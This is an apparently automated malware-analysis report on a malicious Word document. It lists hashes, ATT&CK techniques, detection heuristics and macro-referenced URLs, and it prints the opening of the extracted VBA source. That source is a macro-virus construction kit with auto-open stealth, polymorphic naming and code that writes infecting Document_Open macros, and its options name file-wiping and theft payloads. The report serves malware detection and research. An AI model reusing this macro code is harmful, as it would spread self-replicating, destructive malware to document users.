Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fbcdb412a2adeb52…

MALICIOUS

Office (OLE)

733.5 KB Created: 2000-11-05 11:23:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 6fa3d6333c27e933f806092549d557f8 SHA-1: 738ec0e9c834635a9ddbd2c5218b5c369aff9977 SHA-256: fbcdb412a2adeb5216d2a1182e40c032e5a71693388f54904e85e2aab27d2379
550 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols

The sample is a malicious Word document containing obfuscated VBA macros. The macros utilize `Shell()` and `CreateObject()` calls, indicative of downloading and executing a second-stage payload from one of the embedded URLs. The presence of `AutoOpen` and `Document_Open` macros, along with the 'Obfuscated VBA Shell command with URL' heuristic, strongly suggests a downloader or droppper functionality.

Heuristics 13

  • ClamAV: Dos.Trojan.Munga-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Dos.Trojan.Munga-4
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://group.shadowvx.org Referenced by macro
    • http://group.shadowvx.comReferenced by macro
    • http://www.devilport-systems.deReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 35193 bytes
SHA-256: 18ebfb3053cb1cd6ab6e26745eace731762734a5b120ada0e3ec65122cedb35f
Detection
ClamAV: Dos.Trojan.Munga-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MVCK"
    
    ' =============================================================
    ' Word2K Classvirus Construction Kit by Necronomikon
    ' =============================================================
    ' e-m@il: Necronomikon@shadowvx.com
    ' =============================================================
    ' You are looking for...?
    ' =============================================================
    

Public AOpen As Boolean
Public AClose As Boolean
Public ANew As Boolean
Public Polymorph As Integer
Public Source As Boolean
Public KillFiles As Boolean
Public Shell As Boolean
Public KDLL As Boolean
Public KPF As Boolean
Public KWF As Boolean
Public KAF As Boolean
Public NoNag As Boolean
Public NoCom As Boolean

Public Pass As Boolean
Public WinUser As Boolean
Public Inter As Boolean
Public Nag As Boolean
Public Ass As Boolean
Public HDKill As Boolean
Public IRC As Boolean
Public NoClose As Boolean
Public Outlook As Boolean

Public Tage As Integer
Public Monate As Integer

Public skipme As Integer
Public Passwort As String
Public Benutzer As String
Public URL As String
Public NagText As String
Public AssText As String


Public DokName As String
Public ModulName As String


Sub AutoOpen()
ShowVisualBasicEditor = False
Application.WindowState = wdWindowStateMinimize
AOpen = True
stealth = 0
Tage = Day(Now())
Monate = Month(Now())
Ordner$ = UCase(Options.DefaultFilePath(wdDocumentsPath))
frmStart.Show
End Sub

Sub ViriiMachen()
On Error Resume Next

Randomize

    var1$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)
    var2$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)
    var3$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)
    var4$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)
    var5$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)
    var9$ = (Chr(65 + Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 99)
 
    
    
    var6$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)
    var7$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)
    var8$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)
    
    ActVar$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)
    NiVar$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & Int(Rnd * 999)


ModulName = Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22)) & Int(Rnd * 999)
Ordner$ = Options.DefaultFilePath(wdDocumentsPath)
Data = Ordner$ & "\" & DokName & ".txt"
SaveDok = Ordner$ & "\" & DokName & ".doc"

Open Data For Output As #1
    
    Print #1,
    
    If AOpen = True Then Print #1, "Private Sub Document_Open()"
    If AClose = True Then Print #1, "Private Sub Document_Close()"
    If ANew = True Then Print #1, "Private Sub Document_New()"
    If NoCom = False Then
    Print #1,
    Print #1, "    ' Word2K ClassVirus Creation Kit"
    Print #1, "    ' =================================="
    Print #1, "    ' Code by Necronomikon"
    Print #1, "    ' =================================="
    Print #1, "    ' W2KM." & DokName
    Print #1,
    End If
    Print #1, "On Error Resume Next"
    Print #1, "WordBasic.DisableAutoMacros 0"
    Print #1, "ActiveDocument.ReadOnlyRecommended
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.